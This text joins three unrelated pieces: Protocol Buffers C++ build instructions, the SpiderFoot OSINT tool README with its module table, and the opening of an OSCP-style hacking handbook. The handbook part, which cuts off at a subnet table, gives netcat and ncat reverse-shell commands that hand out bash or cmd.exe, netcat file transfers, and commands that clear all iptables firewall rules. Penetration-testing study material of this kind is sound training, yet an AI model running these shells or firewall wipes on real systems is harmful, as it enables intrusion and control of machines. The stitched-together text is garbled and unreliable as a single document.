To build and install the C++ Protocol Buffer runtime and the Protocol
Buffer compiler (protoc) execute the following:
./configure
make -j$(nproc) # $(nproc) ensures it uses all cores for compilation
make check
sudo make install
sudo ldconfig # refresh shared library cache.
If "make check" fails, you can still install, but it is likely that
some features of this library will not work correctly on your system.
Proceed at your own risk.
For advanced usage information on configure and make, please refer to the
autoconf documentation:
http://www.gnu.org/software/autoconf/manual/autoconf.html#Running-configure-Scripts
**Hint on install location**
By default, the package will be installed to /usr/local. However,
on many platforms, /usr/local/lib is not part of LD_LIBRARY_PATH.
You can add it, but it may be easier to just install to /usr
instead. To do this, invoke configure as follows:
./configure --prefix=/usr
If you already built the package with a different prefix, make sure
to run "make clean" before building again.
**Compiling dependent packages**
To compile a package that uses Protocol Buffers, you need to pass
various flags to your compiler and linker. As of version 2.2.0,
Protocol Buffers integrates with pkg-config to manage this. If you
have pkg-config installed, then you can invoke it to get a list of
flags like so:
pkg-config --cflags protobuf # print compiler flags
pkg-config --libs protobuf # print linker flags
pkg-config --cflags --libs protobuf # print both
For example:
c++ my_program.cc my_proto.pb.cc `pkg-config --cflags --libs protobuf`
Note that packages written prior to the 2.2.0 release of Protocol
Buffers may not yet integrate with pkg-config to get flags, and may
not pass the correct set of flags to correctly link against
libprotobuf. If the package in question uses autoconf, you can
often fix the problem by invoking its configure script like:
configure CXXFLAGS="$(pkg-config --cflags protobuf)" \
LIBS="$(pkg-config --libs protobuf)"
This will force it to use the correct flags.
If you are writing an autoconf-based package that uses Protocol
Buffers, you should probably use the PKG_CHECK_MODULES macro in your
configure script like:
PKG_CHECK_MODULES([protobuf], [protobuf])
See the pkg-config man page for more info.
If you only want protobuf-lite, substitute "protobuf-lite" in place
of "protobuf" in these examples.
**Note for Mac users**
For a Mac system, Unix tools are not available by default. You will first need
to install Xcode from the Mac AppStore and then run the following command from
a terminal:
sudo xcode-select --install
To install Unix tools, you can install "port" following the instructions at
https://www.macports.org . This will reside in /opt/local/bin/port for most
Mac installations.
sudo /opt/local/bin/port install autoconf automake libtool
Then follow the Unix instructions above.
**Note for cross-compiling**
The makefiles normally invoke the protoc executable that they just
built in order to build tests. When cross-compiling, the protoc
executable may not be executable on the host machine. In this case,
you must build a copy of protoc for the host machine first, then use
the --with-protoc option to tell configure to use it instead. For
example:
./configure --with-protoc=protoc
This will use the installed protoc (found in your $PATH) instead of
trying to execute the one built during the build process. You can
also use an executable that hasn't been installed. For example, if
you built the protobuf package for your host machine in ../host,
you might do:
./configure --with-protoc=../host/src/protoc
Either way, you must make sure that the protoc executable you use
has the same version as the protobuf source code you are trying to
use it with.
**Note for Solaris users**
Solaris 10 x86 has a bug that will make linking fail, complaining
about libstdc++.la being invalid. We have included a work-around
in this package. To use the work-around, run configure as follows:
./configure LDFLAGS=-L$PWD/src/solaris
See src/solaris/libstdc++.la for more info on this bug.
**Note for HP C++ Tru64 users**
To compile invoke configure as follows:
./configure CXXFLAGS="-O -std ansi -ieee -D__USE_STD_IOSTREAM"
Also, you will need to use gmake instead of make.
**Note for AIX users**
Compile using the IBM xlC C++ compiler as follows:
./configure CXX=xlC
Also, you will need to use GNU `make` (`gmake`) instead of AIX `make`.
C++ Installation - Windows
--------------------------
If you only need the protoc binary, you can download it from the release
page:
https://github.com/protocolbuffers/protobuf/releases/latest
In the downloads section, download the zip file protoc-$VERSION-win32.zip.
It contains the protoc binary as well as public proto files of protobuf
library.
Protobuf and its dependencies can be installed directly by using `vcpkg`:
>vcpkg install protobuf protobuf:x64-windows
If zlib support is desired, you'll also need to install the zlib feature:
>vcpkg install protobuf[zlib] protobuf[zlib]:x64-windows
See https://github.com/Microsoft/vcpkg for more information.
To build from source using Microsoft Visual C++, see [cmake/README.md](../cmake/README.md).
To build from source using Cygwin or MinGW, follow the Unix installation
instructions, above.
Binary Compatibility Warning
----------------------------
Due to the nature of C++, it is unlikely that any two versions of the
Protocol Buffers C++ runtime libraries will have compatible ABIs.
That is, if you linked an executable against an older version of
libprotobuf, it is unlikely to work with a newer version without
re-compiling. This problem, when it occurs, will normally be detected
immediately on startup of your app. Still, you may want to consider
using static linkage. You can configure this package to install
static libraries only using:
./configure --disable-shared
Usage
-----
The complete documentation for Protocol Buffers is available via the
web at:
https://developers.google.com/protocol-buffers/
|
<a href="https://www.spiderfoot.net/r.php?u=aHR0cHM6Ly93d3cuc3BpZGVyZm9vdC5uZXQv&s=os_gh"><img src="https://www.spiderfoot.net/wp-content/themes/spiderfoot/img/spiderfoot-wide.png"></a>
[![License](https://img.shields.io/badge/license-GPLv2-blue.svg)](https://raw.githubusercontent.com/smicallef/spiderfoot/master/LICENSE)
[![Python Version](https://img.shields.io/badge/python-3.6+-green)](https://www.python.org)
[![Stable Release](https://img.shields.io/badge/version-3.1-blue.svg)](https://github.com/smicallef/spiderfoot/releases/tag/v3.1)
[![CI Status](https://img.shields.io/travis/smicallef/spiderfoot)](https://travis-ci.com/github/smicallef/spiderfoot)
[![Last Commit](https://img.shields.io/github/last-commit/smicallef/spiderfoot)](https://github.com/smicallef/spiderfoot/commits/master)
[![Libraries.io dependency status for latest release](https://img.shields.io/librariesio/release/github/smicallef/spiderfoot)](https://libraries.io/github/smicallef/spiderfoot)
[![Twitter Follow](https://img.shields.io/twitter/follow/spiderfoot?label=follow&style=social)](https://twitter.com/spiderfoot)
**SpiderFoot** is an open source intelligence (OSINT) automation tool. It integrates with just about every data source available and utilises a range of methods for data analysis, making that data easy to navigate.
SpiderFoot has an embedded web-server for providing a clean and intuitive web-based interface but can also be used completely via the command-line. It's written in **Python 3** and **GPL-licensed**.
<img src="https://www.spiderfoot.net/wp-content/uploads/2020/08/SpiderFoot-3.1-browse.png">
### FEATURES
- Web based UI or CLI
- Over 170 modules (see below)
- Python 3
- CSV/JSON/GEXF export
- API key export/import
- SQLite back-end for custom querying
- Highly configurable
- Fully documented
- Visualisations
- TOR integration for dark web searching
- Dockerfile for Docker-based deployments
- Can call other tools like DNSTwist, Whatweb and CMSeeK
- Actively developed since 2012!
### USES
SpiderFoot can be used offensively (e.g. in a red team exercise or penetration test) for reconnaissance of your target or defensively to gather information about what you or your organisation might have exposed over the Internet.
You can target the following entities in a SpiderFoot scan:
- IP address
- Domain/sub-domain name
- Hostname
- Network subnet (CIDR)
- ASN
- E-mail address
- Phone number
- Username
- Person's name
SpiderFoot's 170+ modules feed each other in a publisher/subscriber model to ensure maximum data extraction to do things like:
- Host/sub-domain/TLD enumeration/extraction
- E-mail address enumeration/extraction
- Phone number extraction
- Bitcoin and Ethereum address extraction
- DNS zone transfers
- Threat intelligence and Blacklist queries
- API integraiton with SHODAN, HaveIBeenPwned, Censys, AlienVault, SecurityTrails, etc.
- Social media account enumeration
- S3/Azure/Digitalocean bucket enumeration/scraping
- IP geo-location
- Web scraping, web content analysis
- Image and binary file meta data analysis
- Office document meta data analysis
- Dark web searches
- So much more...
See it in action here, performing some DNS recon:
[![asciicast](https://asciinema.org/a/295912.svg)](https://asciinema.org/a/295912)
### MODULES
| Module | Name | Description |
| :------------- |:-------------| :------------|
sfp_abusech.py|abuse.ch|Check if a host/domain, IP or netblock is malicious according to abuse.ch.|
sfp_abuseipdb.py|AbuseIPDB|Check if a netblock or IP is malicious according to AbuseIPDB.com.|
sfp_accounts.py|Accounts|Look for possible associated accounts on nearly 200 websites like Ebay, Slashdot, reddit, etc.|
sfp_adblock.py|AdBlock Check|Check if linked pages would be blocked by AdBlock Plus.|
sfp_ahmia.py|Ahmia|Search Tor 'Ahmia' search engine for mentions of the target domain.|
sfp_alienvaultiprep.py|AlienVault IP Reputation|Check if an IP or netblock is malicious according to the AlienVault IP Reputation database.|
sfp_alienvault.py|AlienVault OTX|Obtain information from AlienVault Open Threat Exchange (OTX)|
sfp_apility.py|Apility|Search Apility API for IP address and domain reputation.|
sfp_archiveorg.py|Archive.org|Identifies historic versions of interesting files/pages from the Wayback Machine.|
sfp_arin.py|ARIN|Queries ARIN registry for contact information.|
sfp_azureblobstorage.py|Azure Blob Finder|Search for potential Azure blobs associated with the target and attempt to list their contents.|
sfp_badipscom.py|badips.com|Check if a domain or IP is malicious according to badips.com.|
sfp_bambenek.py|Bambenek C&C List|Check if a host/domain or IP appears on Bambenek Consulting's C&C tracker lists.|
sfp_base64.py|Base64|Identify Base64-encoded strings in any content and URLs, often revealing interesting hidden information.|
sfp_bgpview.py|BGPView|Obtain network information from BGPView API.|
sfp_binaryedge.py|BinaryEdge|Obtain information from BinaryEdge.io's Internet scanning systems about breaches, vulerabilities, torrents and passive DNS.|
sfp_bingsearch.py|Bing|Obtain information from bing to identify sub-domains and links.|
sfp_bingsharedip.py|Bing (Shared IPs)|Search Bing for hosts sharing the same IP.|
sfp_binstring.py|Binary String Extractor|Attempt to identify strings in binary content.|
sfp_bitcoin.py|Bitcoin Finder|Identify bitcoin addresses in scraped webpages.|
sfp_blockchain.py|Blockchain|Queries blockchain.info to find the balance of identified bitcoin wallet addresses.|
sfp_blocklistde.py|blocklist.de|Check if a netblock or IP is malicious according to blocklist.de.|
sfp_botscout.py|BotScout|Searches botscout.com's database of spam-bot IPs and e-mail addresses.|
sfp_builtwith.py|BuiltWith|Query BuiltWith.com's Domain API for information about your target's web technology stack, e-mail addresses and more.|
sfp_callername.py|CallerName|Lookup US phone number location and reputation information.|
sfp_censys.py|Censys|Obtain information from Censys.io|
sfp_cinsscore.py|CINS Army List|Check if a netblock or IP is malicious according to cinsscore.com's Army List.|
sfp_circllu.py|CIRCL.LU|Obtain information from CIRCL.LU's Passive DNS and Passive SSL databases.|
sfp_citadel.py|Citadel Engine|Searches Leak-Lookup.com's database of breaches.|
sfp_cleanbrowsing.py|Cleanbrowsing.org|Check if a host would be blocked by Cleanbrowsing.org DNS|
sfp_cleantalk.py|CleanTalk Spam List|Check if an IP is on CleanTalk.org's spam IP list.|
sfp_clearbit.py|Clearbit|Check for names, addresses, domains and more based on lookups of e-mail addresses on clearbit.com.|
sfp_coinblocker.py|CoinBlocker Lists|Check if a host/domain or IP appears on CoinBlocker lists.|
sfp_commoncrawl.py|CommonCrawl|Searches for URLs found through CommonCrawl.org.|
sfp_comodo.py|Comodo|Check if a host would be blocked by Comodo DNS|
sfp_company.py|Company Names|Identify company names in any obtained data.|
sfp_cookie.py|Cookies|Extract Cookies from HTTP headers.|
sfp_crossref.py|Cross-Reference|Identify whether other domains are associated ('Affiliates') of the target.|
sfp_crt.py|Certificate Transparency|Gather hostnames from historical certificates in crt.sh.|
sfp_customfeed.py|Custom Threat Feed|Check if a host/domain, netblock, ASN or IP is malicious according to your custom feed.|
sfp_cybercrimetracker.py|cybercrime-tracker.net|Check if a host/domain or IP is malicious according to cybercrime-tracker.net.|
sfp_darksearch.py|Darksearch|Search the Darksearch.io Tor search engine for mentions of the target domain.|
sfp_digitaloceanspace.py|Digital Ocean Space Finder|Search for potential Digital Ocean Spaces associated with the target and attempt to list their contents.|
sfp_dnsbrute.py|DNS Brute-force|Attempts to identify hostnames through brute-forcing common names and iterations.|
sfp_dnscommonsrv.py|DNS Common SRV|Attempts to identify hostnames through common SRV.|
sfp_dnsneighbor.py|DNS Look-aside|Attempt to reverse-resolve the IP addresses next to your target to see if they are related.|
sfp_dnsraw.py|DNS Raw Records|Retrieves raw DNS records such as MX, TXT and others.|
sfp_dnsresolve.py|DNS Resolver|Resolves Hosts and IP Addresses identified, also extracted from raw content.|
sfp_dnszonexfer.py|DNS Zone Transfer|Attempts to perform a full DNS zone transfer.|
sfp_dronebl.py|DroneBL|Query the DroneBL database for open relays, open proxies, vulnerable servers, etc.|
sfp_duckduckgo.py|DuckDuckGo|Query DuckDuckGo's API for descriptive information about your target.|
sfp_emailformat.py|EmailFormat|Look up e-mail addresses on email-format.com.|
sfp_email.py|E-Mail|Identify e-mail addresses in any obtained data.|
sfp_emailrep.py|EmailRep|Search EmailRep.io for email address reputation.|
sfp_errors.py|Errors|Identify common error messages in content like SQL errors, etc.|
sfp_ethereum.py|Ethereum Finder|Identify ethereum addresses in scraped webpages.|
sfp_filemeta.py|File Metadata|Extracts meta data from documents and images.|
sfp_flickr.py|Flickr|Look up e-mail addresses on Flickr.|
sfp_fortinet.py|Fortiguard.com|Check if an IP is malicious according to Fortiguard.com.|
sfp_fraudguard.py|Fraudguard|Obtain threat information from Fraudguard.io|
sfp_fringeproject.py|Fringe Project|Obtain network information from Fringe Project API.|
sfp_fsecure_riddler.py|F-Secure Riddler.io|Obtain network information from F-Secure Riddler.io API.|
sfp_fullcontact.py|FullContact|Gather domain and e-mail information from fullcontact.com.|
sfp_github.py|Github|Identify associated public code repositories on Github.|
sfp_googlemaps.py|Google Maps|Identifies potential physical addresses and latitude/longitude coordinates.|
sfp_googlesearch.py|Google|Obtain information from the Google Custom Search API to identify sub-domains and links.|
sfp_gravatar.py|Gravatar|Retrieve user information from Gravatar API.|
sfp_greynoise.py|Greynoise|Obtain information from Greynoise.io's Enterprise API.|
sfp_h1nobbdde.py|HackerOne (Unofficial)|Check external vulnerability scanning/reporting service h1.nobbd.de to see if the target is listed.|
sfp_hackertarget.py|HackerTarget.com|Search HackerTarget.com for hosts sharing the same IP.|
sfp_haveibeenpwned.py|HaveIBeenPwned|Check HaveIBeenPwned.com for hacked e-mail addresses identified in breaches.|
sfp_honeypot.py|Honeypot Checker|Query the projecthoneypot.org database for entries.|
sfp_hosting.py|Hosting Providers|Find out if any IP addresses identified fall within known 3rd party hosting ranges, e.g. Amazon, Azure, etc.|
sfp_hostsfilenet.py|hosts-file.net Malicious Hosts|Check if a host/domain is malicious according to hosts-file.net Malicious Hosts.|
sfp_hunter.py|Hunter.io|Check for e-mail addresses and names on hunter.io.|
sfp_iknowwhatyoudownload.py|Iknowwhatyoudownload.com|Check iknowwhatyoudownload.com for IP addresses that have been using BitTorrent.|
sfp_instagram.py|Instagram|Gather information from Instagram profiles.|
sfp_intelx.py|IntelligenceX|Obtain information from IntelligenceX about identified IP addresses, domains, e-mail addresses and phone numbers.|
sfp_intfiles.py|Interesting Files|Identifies potential files of interest, e.g. office documents, zip files.|
sfp_ipinfo.py|IPInfo.io|Identifies the physical location of IP addresses identified using ipinfo.io.|
sfp_ipstack.py|ipstack|Identifies the physical location of IP addresses identified using ipstack.com.|
sfp_isc.py|Internet Storm Center|Check if an IP is malicious according to SANS ISC.|
sfp_junkfiles.py|Junk Files|Looks for old/temporary and other similar files.|
sfp_malwaredomainlist.py|malwaredomainlist.com|Check if a host/domain, IP or netblock is malicious according to malwaredomainlist.com.|
sfp_malwaredomains.py|malwaredomains.com|Check if a host/domain is malicious according to malwaredomains.com.|
sfp_malwarepatrol.py|MalwarePatrol|Searches malwarepatrol.net's database of malicious URLs/IPs.|
sfp_metadefender.py|MetaDefender|Search MetaDefender API for IP address and domain IP reputation.|
sfp_mnemonic.py|Mnemonic PassiveDNS|Obtain Passive DNS information from PassiveDNS.mnemonic.no.|
sfp_multiproxy.py|multiproxy.org Open Proxies|Check if an IP is an open proxy according to multiproxy.org' open proxy list.|
sfp_myspace.py|MySpace|Gather username and location from MySpace.com profiles.|
sfp_names.py|Name Extractor|Attempt to identify human names in fetched content.|
sfp_neutrinoapi.py|NeutrinoAPI|Search NeutrinoAPI for IP address info and check IP reputation.|
sfp_norton.py|Norton ConnectSafe|Check if a host would be blocked by Norton ConnectSafe DNS|
sfp_nothink.py|Nothink.org|Check if a host/domain, netblock or IP is malicious according to Nothink.org.|
sfp_numpi.py|numpi|Lookup USA/Canada phone number location and carrier information from numpi.com.|
sfp_numverify.py|numverify|Lookup phone number location and carrier information from numverify.com.|
sfp_onioncity.py|Onion.link|Search Tor 'Onion City' search engine for mentions of the target domain.|
sfp_onionsearchengine.py|Onionsearchengine.com|Search Tor onionsearchengine.com for mentions of the target domain.|
sfp_openbugbounty.py|Open Bug Bounty|Check external vulnerability scanning/reporting service openbugbounty.org to see if the target is listed.|
sfp_opencorporates.py|OpenCorporates|Look up company information from OpenCorporates.|
sfp_opendns.py|OpenDNS|Check if a host would be blocked by OpenDNS DNS|
sfp_openphish.py|OpenPhish|Check if a host/domain is malicious according to OpenPhish.com.|
sfp_openstreetmap.py|OpenStreetMap|Retrieves latitude/longitude coordinates for physical addresses from OpenStreetMap API.|
sfp_pageinfo.py|Page Info|Obtain information about web pages (do they take passwords, do they contain forms, etc.)|
sfp_pastebin.py|PasteBin|PasteBin scraping (via Google) to identify related content.|
sfp_pgp.py|PGP Key Look-up|Look up e-mail addresses in PGP public key servers.|
sfp_phishtank.py|PhishTank|Check if a host/domain is malicious according to PhishTank.|
sfp_phone.py|Phone Numbers|Identify phone numbers in scraped webpages.|
sfp_portscan_tcp.py|Port Scanner - TCP|Scans for commonly open TCP ports on Internet-facing systems.|
sfp_psbdmp.py|Psbdmp.com|Check psbdmp.cc (PasteBin Dump) for potentially hacked e-mails and domains.|
sfp_pulsedive.py|Pulsedive|Obtain information from Pulsedive's API.|
sfp_quad9.py|Quad9|Check if a host would be blocked by Quad9|
sfp_ripe.py|RIPE|Queries the RIPE registry (includes ARIN data) to identify netblocks and other info.|
sfp_riskiq.py|RiskIQ|Obtain information from RiskIQ's (formerly PassiveTotal) Passive DNS and Passive SSL databases.|
sfp_robtex.py|Robtex|Search Robtex.com for hosts sharing the same IP.|
sfp_s3bucket.py|Amazon S3 Bucket Finder|Search for potential Amazon S3 buckets associated with the target and attempt to list their contents.|
sfp_scylla.py|Scylla|Gather breach data from Scylla API.|
sfp_securitytrails.py|SecurityTrails|Obtain Passive DNS and other information from SecurityTrails|
sfp_shodan.py|SHODAN|Obtain information from SHODAN about identified IP addresses.|
sfp_similar.py|Similar Domains|Search various sources to identify similar looking domain names, for instance squatted domains.|
sfp_skymem.py|Skymem|Look up e-mail addresses on Skymem.|
sfp_slideshare.py|SlideShare|Gather name and location from SlideShare profiles.|
sfp_socialprofiles.py|Social Media Profiles|Tries to discover the social media profiles for human names identified.|
sfp_social.py|Social Networks|Identify presence on social media networks such as LinkedIn, Twitter and others.|
sfp_sorbs.py|SORBS|Query the SORBS database for open relays, open proxies, vulnerable servers, etc.|
sfp_spamcop.py|SpamCop|Query various spamcop databases for open relays, open proxies, vulnerable servers, etc.|
sfp_spamhaus.py|Spamhaus|Query the Spamhaus databases for open relays, open proxies, vulnerable servers, etc.|
sfp_spider.py|Spider|Spidering of web-pages to extract content for searching.|
sfp_spyonweb.py|SpyOnWeb|Search SpyOnWeb for hosts sharing the same IP address, Google Analytics code, or Google Adsense code.|
sfp_sslcert.py|SSL Certificates|Gather information about SSL certificates used by the target's HTTPS sites.|
sfp_ssltools.py|SSL Tools|Gather information about SSL certificates from SSLTools.com.|
sfp__stor_db.py|Storage|Stores scan results into the back-end SpiderFoot database. You will need this.|
sfp__stor_stdout.py|Command-line output|Dumps output to standard out. Used for when a SpiderFoot scan is run via the command-line.|
sfp_strangeheaders.py|Strange Headers|Obtain non-standard HTTP headers returned by web servers.|
sfp_talosintel.py|Talos Intelligence|Check if a netblock or IP is malicious according to talosintelligence.com.|
sfp_threatcrowd.py|ThreatCrowd|Obtain information from ThreatCrowd about identified IP addresses, domains and e-mail addresses.|
sfp_threatexpert.py|ThreatExpert.com|Check if a host/domain or IP is malicious according to ThreatExpert.com.|
sfp_threatminer.py|ThreatMiner|Obtain information from ThreatMiner's database for passive DNS and threat intelligence.|
sfp_tldsearch.py|TLD Search|Search all Internet TLDs for domains with the same name as the target (this can be very slow.)|
sfp_tool_cmseek.py|Tool - CMSeeK|Identify what Content Management System (CMS) might be used.|
sfp_tool_dnstwist.py|Tool - DNSTwist|Identify bit-squatting, typo and other similar domains to the target using a local DNSTwist installation.|
sfp_tool_whatweb.py|Tool - WhatWeb|Identify what software is in use on the specified website.|
sfp_torch.py|TORCH|Search Tor 'TORCH' search engine for mentions of the target domain.|
sfp_torexits.py|TOR Exit Nodes|Check if an IP or netblock appears on the torproject.org exit node list.|
sfp_totalhash.py|TotalHash.com|Check if a host/domain or IP is malicious according to TotalHash.com.|
sfp_twitter.py|Twitter|Gather name and location from Twitter profiles.|
sfp_uceprotect.py|UCEPROTECT|Query the UCEPROTECT databases for open relays, open proxies, vulnerable servers, etc.|
sfp_urlscan.py|URLScan.io|Search URLScan.io cache for domain information.|
sfp_venmo.py|Venmo|Gather user information from Venmo API.|
sfp_viewdns.py|ViewDNS.info|Reverse Whois lookups using ViewDNS.info.|
sfp_virustotal.py|VirusTotal|Obtain information from VirusTotal about identified IP addresses.|
sfp_voipbl.py|VoIPBL OpenPBX IPs|Check if an IP or netblock is an open PBX according to VoIPBL OpenPBX IPs.|
sfp_vxvault.py|VXVault.net|Check if a domain or IP is malicious according to VXVault.net.|
sfp_watchguard.py|Watchguard|Check if an IP is malicious according to Watchguard's reputationauthority.org.|
sfp_webanalytics.py|Web Analytics|Identify web analytics IDs in scraped webpages and DNS TXT records.|
sfp_webframework.py|Web Framework|Identify the usage of popular web frameworks like jQuery, YUI and others.|
sfp_webserver.py|Web Server|Obtain web server banners to identify versions of web servers being used.|
sfp_whatcms.py|WhatCMS|Check web technology using WhatCMS.org API.|
sfp_whoisology.py|Whoisology|Reverse Whois lookups using Whoisology.com.|
sfp_whois.py|Whois|Perform a WHOIS look-up on domain names and owned netblocks.|
sfp_whoxy.py|Whoxy|Reverse Whois lookups using Whoxy.com.|
sfp_wigle.py|Wigle.net|Query wigle.net to identify nearby WiFi access points.|
sfp_wikileaks.py|Wikileaks|Search Wikileaks for mentions of domain names and e-mail addresses.|
sfp_wikipediaedits.py|Wikipedia Edits|Identify edits to Wikipedia articles made from a given IP address or username.|
sfp_xforce.py|XForce Exchange|Obtain information from IBM X-Force Exchange|
sfp_yandexdns.py|Yandex DNS|Check if a host would be blocked by Yandex DNS|
sfp_zoneh.py|Zone-H Defacement Check|Check if a hostname/domain appears on the zone-h.org 'special defacements' RSS feed.|
### DOCUMENTATION
Read more at the [project website](https://www.spiderfoot.net/r.php?u=aHR0cHM6Ly93d3cuc3BpZGVyZm9vdC5uZXQv&s=os_gh), including more complete documentation, blog posts with tutorials/guides, plus information about [SpiderFoot HX](https://www.spiderfoot.net/r.php?u=aHR0cHM6Ly93d3cuc3BpZGVyZm9vdC5uZXQvaHgvCg==&s=os_gh).
Latest updates announced on [Twitter](https://twitter.com/spiderfoot).
|
# wired-courtyard
*Handbook and survival guide for hacking over the wire, OSCP-style*
<br>
***UPDATE: October 4, 2017***
For OSCP Lab machine enumeration automation, checkout my other project: **VANQUISH**
Vanquish is a Kali Linux based Enumeration Orchestrator written in Python. Vanquish leverages the opensource enumeration tools on Kali to perform multiple active information gathering phases. The results of each phase are fed into the next phase to identify vulnerabilities that could be leveraged for a remote shell.
https://github.com/frizb/Vanquish
**NOTE: This document refers to the target ip as the export variable $ip.**
**To set this value on the command line use the following syntax:**
**export ip=192.168.1.100**
## Table of Contents
- [Kali Linux](#kali-linux)
- [Information Gathering & Vulnerability Scanning](#information-gathering--vulnerability-scanning)
* [Passive Information Gathering](#passive-information-gathering)
* [Active Information Gathering](#active-information-gathering)
* [Port Scanning](#port-scanning)
* [Enumeration](#enumeration)
* [HTTP Enumeration](#http-enumeration)
- [Buffer Overflows and Exploits](#buffer-overflows-and-exploits)
- [Shells](#shells)
- [File Transfers](#file-transfers)
- [Privilege Escalation](#privilege-escalation)
* [Linux Privilege Escalation](#linux-privilege-escalation)
* [Windows Privilege Escalation](#windows-privilege-escalation)
- [Client, Web and Password Attacks](#client-web-and-password-attacks)
* [Client Attacks](#client-attacks)
* [Web Attacks](#web-attacks)
* [File Inclusion Vulnerabilities LFI/RFI](#file-inclusion-vulnerabilities)
* [Database Vulnerabilities](#database-vulnerabilities)
* [Password Attacks](#password-attacks)
* [Password Hash Attacks](#password-hash-attacks)
- [Networking, Pivoting and Tunneling](#networking-pivoting-and-tunneling)
- [The Metasploit Framework](#the-metasploit-framework)
- [Bypassing Antivirus Software](#bypassing-antivirus-software)
Kali Linux
========================================================================================================
- Set the Target IP Address to the `$ip` system variable
`export ip=192.168.1.100`
- Find the location of a file
`locate sbd.exe`
- Search through directories in the `$PATH` environment variable
`which sbd`
- Find a search for a file that contains a specific string in it’s
name:
`find / -name sbd\*`
- Show active internet connections
`netstat -lntp`
- Change Password
`passwd`
- Verify a service is running and listening
`netstat -antp |grep apache`
- Start a service
`systemctl start ssh `
`systemctl start apache2`
- Have a service start at boot
`systemctl enable ssh`
- Stop a service
`systemctl stop ssh`
- Unzip a gz file
`gunzip access.log.gz`
- Unzip a tar.gz file
`tar -xzvf file.tar.gz`
- Search command history
`history | grep phrase_to_search_for`
- Download a webpage
`wget http://www.cisco.com`
- Open a webpage
`curl http://www.cisco.com`
- String manipulation
- Count number of lines in file
`wc -l index.html`
- Get the start or end of a file
`head index.html`
`tail index.html`
- Extract all the lines that contain a string
`grep "href=" index.html`
- Cut a string by a delimiter, filter results then sort
`grep "href=" index.html | cut -d "/" -f 3 | grep "\\." | cut -d '"' -f 1 | sort -u`
- Using Grep and regular expressions and output to a file
`cat index.html | grep -o 'http://\[^"\]\*' | cut -d "/" -f 3 | sort –u > list.txt`
- Use a bash loop to find the IP address behind each host
`for url in $(cat list.txt); do host $url; done`
- Collect all the IP Addresses from a log file and sort by
frequency
`cat access.log | cut -d " " -f 1 | sort | uniq -c | sort -urn`
- Decoding using Kali
- Decode Base64 Encoded Values
`echo -n "QWxhZGRpbjpvcGVuIHNlc2FtZQ==" | base64 --decode`
- Decode Hexidecimal Encoded Values
`echo -n "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874" | xxd -r -ps`
- Netcat - Read and write TCP and UDP Packets
- Download Netcat for Windows (handy for creating reverse shells and transfering files on windows systems):
[https://joncraton.org/blog/46/netcat-for-windows/](https://joncraton.org/blog/46/netcat-for-windows/)
- Connect to a POP3 mail server
`nc -nv $ip 110`
- Listen on TCP/UDP port
`nc -nlvp 4444`
- Connect to a netcat port
`nc -nv $ip 4444`
- Send a file using netcat
`nc -nv $ip 4444 < /usr/share/windows-binaries/wget.exe`
- Receive a file using netcat
`nc -nlvp 4444 > incoming.exe`
- Some OSs (OpenBSD) will use nc.traditional rather than nc so watch out for that...
whereis nc
nc: /bin/nc.traditional /usr/share/man/man1/nc.1.gz
/bin/nc.traditional -e /bin/bash 1.2.3.4 4444
- Create a reverse shell with Ncat using cmd.exe on Windows
`nc.exe -nlvp 4444 -e cmd.exe`
or
`nc.exe -nv <Remote IP> <Remote Port> -e cmd.exe`
- Create a reverse shell with Ncat using bash on Linux
`nc -nv $ip 4444 -e /bin/bash`
- Netcat for Banner Grabbing:
`echo "" | nc -nv -w1 <IP Address> <Ports>`
- Ncat - Netcat for Nmap project which provides more security avoid
IDS
- Reverse shell from windows using cmd.exe using ssl
`ncat --exec cmd.exe --allow $ip -vnl 4444 --ssl`
- Listen on port 4444 using ssl
`ncat -v $ip 4444 --ssl`
- Wireshark
- Show only SMTP (port 25) and ICMP traffic:
`tcp.port eq 25 or icmp`
- Show only traffic in the LAN (192.168.x.x), between workstations and servers -- no Internet:
`ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16`
- Filter by a protocol ( e.g. SIP ) and filter out unwanted IPs:
`ip.src != xxx.xxx.xxx.xxx && ip.dst != xxx.xxx.xxx.xxx && sip`
- Some commands are equal
`ip.addr == xxx.xxx.xxx.xxx`
Equals
`ip.src == xxx.xxx.xxx.xxx or ip.dst == xxx.xxx.xxx.xxx `
` ip.addr != xxx.xxx.xxx.xxx`
Equals
`ip.src != xxx.xxx.xxx.xxx or ip.dst != xxx.xxx.xxx.xxx`
- Tcpdump
- Display a pcap file
`tcpdump -r passwordz.pcap`
- Display ips and filter and sort
`tcpdump -n -r passwordz.pcap | awk -F" " '{print $3}' | sort -u | head`
- Grab a packet capture on port 80
`tcpdump tcp port 80 -w output.pcap -i eth0`
- Check for ACK or PSH flag set in a TCP packet
`tcpdump -A -n 'tcp[13] = 24' -r passwordz.pcap`
- IPTables
- Deny traffic to ports except for Local Loopback
`iptables -A INPUT -p tcp --destination-port 13327 ! -d $ip -j DROP `
`iptables -A INPUT -p tcp --destination-port 9991 ! -d $ip -j DROP`
- Clear ALL IPTables firewall rules
```bash
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -t nat -F
iptables -t mangle -F
iptables -F
iptables -X
iptables -t raw -F iptables -t raw -X
```
Information Gathering & Vulnerability Scanning
===================================================================================================================================
- Passive Information Gathering
---------------------------------------------------------------------------------------------------------------------------
- Google Hacking
- Google search to find website sub domains
`site:microsoft.com`
- Google filetype, and intitle
`intitle:"netbotz appliance" "OK" -filetype:pdf`
- Google inurl
`inurl:"level/15/sexec/-/show"`
- Google Hacking Database:
https://www.exploit-db.com/google-hacking-database/
- SSL Certificate Testing
[https://www.ssllabs.com/ssltest/analyze.html](https://www.ssllabs.com/ssltest/analyze.html)
- Email Harvesting
- Simply Email
`git clone https://github.com/killswitch-GUI/SimplyEmail.git `
`./SimplyEmail.py -all -e TARGET-DOMAIN`
- Netcraft
- Determine the operating system and tools used to build a site
https://searchdns.netcraft.com/
- Whois Enumeration
`whois domain-name-here.com `
`whois $ip`
- Banner Grabbing
- `nc -v $ip 25`
- `telnet $ip 25`
- `nc TARGET-IP 80`
- Recon-ng - full-featured web reconnaissance framework written in Python
- `cd /opt; git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git `
`cd /opt/recon-ng `
`./recon-ng `
`show modules `
`help`
- Active Information Gathering
--------------------------------------------------------------------------------------------------------------------------
<!-- -->
- Port Scanning
-----------------------------------------------------------------------------------------------------------
*Subnet Reference Table*
/ | Addresses | Hosts | Netmask | Amount of a Class C
--- | --- | --- | --- | ---
/30 | 4 | 2 | 255.255.255.252| 1/64
